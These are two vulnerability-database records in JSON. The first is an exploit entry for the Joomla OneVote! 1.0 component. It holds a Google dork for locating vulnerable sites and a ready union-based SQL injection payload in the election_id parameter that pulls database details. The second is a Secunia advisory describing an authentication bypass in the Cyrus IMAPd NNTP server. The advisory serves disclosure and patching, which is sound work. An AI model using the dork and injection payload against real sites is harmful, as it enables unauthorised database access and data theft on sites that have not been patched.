{"sourceData": "# # # # # \r\n# Exploit Title: Joomla! Component OneVote! v1.0 - SQL Injection\r\n# Google Dork: inurl:index.php?option=com_onevote\r\n# Date: 27.02.2017\r\n# Vendor Homepage: http://advcomsys.com/\r\n# Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onevote/\r\n# Demo: http://advcomsys.com/index.php/joomla-demos/elections\r\n# Version: 1.0\r\n# Tested on: Win7 x64, Kali Linux x64\r\n# # # # # \r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Mail : ihsan[@]ihsan[.]net\r\n# # # # #\r\n# SQL Injection/Exploit :\r\n# http://localhost/[PATH]/components/com_onevote/results.php?election_id=[SQL]\r\n# +/*!50000union*/[email\u00a0protected]@version-- -\r\n# # # # #\n\n# 0day.today [2018-04-11] #", "history": [], "description": "Exploit for php platform in category web applications", "sourceHref": "https://0day.today/exploit/27141", "reporter": "Ihsan Sencan", "href": "https://0day.today/exploit/description/27141", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "a567bcb50d2e8a7db269ca5dc5d2eb27"}, {"key": "modified", "hash": "09e32482f2d093412c676b8f4083c6a5"}, {"key": "published", "hash": "09e32482f2d093412c676b8f4083c6a5"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8f9da6443571f75195f401f82e60b810"}, {"key": "sourceData", "hash": "e2888cbf8f4fa80f5c6e29b8e2671526"}, {"key": "sourceHref", "hash": "8ee11383445e9642399d56c4a9934631"}, {"key": "title", "hash": "87e931fedc19bc03c821a3fb2e2e8ddf"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 6, "references": [], "lastseen": "2018-04-11T15:01:23", "published": "2017-02-27T00:00:00", "objectVersion": "1.3", "cvelist": [], "id": "1337DAY-ID-27141", "hash": "e67411d2c8a7a85c46dd254701ffcb4636d7b1f479f32aa83db83ab0155e11eb", "modified": "2017-02-27T00:00:00", "title": "Joomla OneVote! 1.0 Component - SQL Injection Vulnerability", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-04-11T15:01:23"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27141"]}], "modified": "2018-04-11T15:01:23"}, "vulnersScore": 0.1}}

{"securityvulns": [{"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "description": "====================================================================== \r\n\r\n Secunia Research 05/10/2011\r\n\r\n - Cyrus IMAPd NTTP Authentication Bypass Vulnerability -\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nVendor's Description of Software.....................................3\r\nDescription of Vulnerability.........................................4\r\nSolution.............................................................5\r\nTime Table...........................................................6\r\nCredits..............................................................7\r\nReferences...........................................................8\r\nAbout Secunia........................................................9\r\nVerification........................................................10\r\n\r\n======================================================================\r\n1) Affected Software \r\n\r\n* Cyrus IMAPd 2.4.10 and 2.4.11\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\n======================================================================\r\n2) Severity \r\n\r\nRating: Moderately critical\r\nImpact: Security bypass\r\nWhere: From remote\r\n\r\n======================================================================\r\n3) Vendor's Description of Software \r\n\r\n"Cyrus is a highly scalable enterprise mail system designed for use\r\nin enterprise environments of various sizes using standards based\r\ntechnologies. Cyrus technologies scale from independent use in email\r\ndepartments to a system centrally managed in a large enterprise.".\r\n\r\nProduct Link:\r\nhttp://www.cyrusimap.org/\r\n\r\n======================================================================\r\n4) Description of Vulnerability\r\n\r\nSecunia Research has discovered a vulnerability in Cyrus IMAPd, which\r\ncan be exploited by malicious people to bypass certain security\r\nrestrictions.\r\n\r\nThe vulnerability is caused by an error in the authentication \r\nmechanism of the NNTP server. This can be exploited to bypass the \r\nauthentication process and execute commands intended for \r\nauthenticated users only by sending an "AUTHINFO USER" command \r\nwithout a following "AUTHINFO PASS" command.\r\n\r\n======================================================================\r\n5) Solution \r\n\r\nUpdate to version 2.4.12.\r\n\r\n====================================================================== \r\n6) Time Table \r\n\r\n19/09/2011 - Vendor notified.\r\n20/09/2011 - Vendor response.\r\n05/10/2011 - Public disclosure.\r\n\r\n====================================================================== \r\n7) Credits \r\n\r\nDiscovered by Stefan Cornelius, Secunia Research.\r\n\r\n====================================================================== \r\n8) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has not yet\r\nassigned a CVE identifier for the vulnerability.\r\n\r\n====================================================================== \r\n9) About Secunia\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private \r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the \r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n====================================================================== \r\n10) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2011-68/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n", "modified": "2011-10-10T00:00:00", "published": "2011-10-10T00:00:00", "id": "SECURITYVULNS:DOC:27141", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27141", "title": "Secunia Research: Cyrus IMAPd NTTP Authentication Bypass Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}